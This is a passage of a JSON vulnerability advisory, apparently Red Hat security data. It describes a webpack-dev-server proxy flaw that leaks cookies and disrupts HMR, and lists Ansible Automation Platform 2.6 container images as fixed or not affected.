"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488934"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in webpack-dev-server. When a user configures a proxy with a broad context, such as \u0027/\u0027, and enables WebSocket (ws: true) forwarding, the development server\u0027s own Hot Module Replacement (HMR) WebSocket can be intercepted. This interception leads to the leakage of the browser\u0027s cookies and Origin header to the proxy target, bypassing the server\u0027s Host/Origin validation. Additionally, it can corrupt the HMR socket, resulting in a denial of service for the HMR functionality.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack-dev-server: webpack-dev-server: Information disclosure and denial of service via improper proxy configuration",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
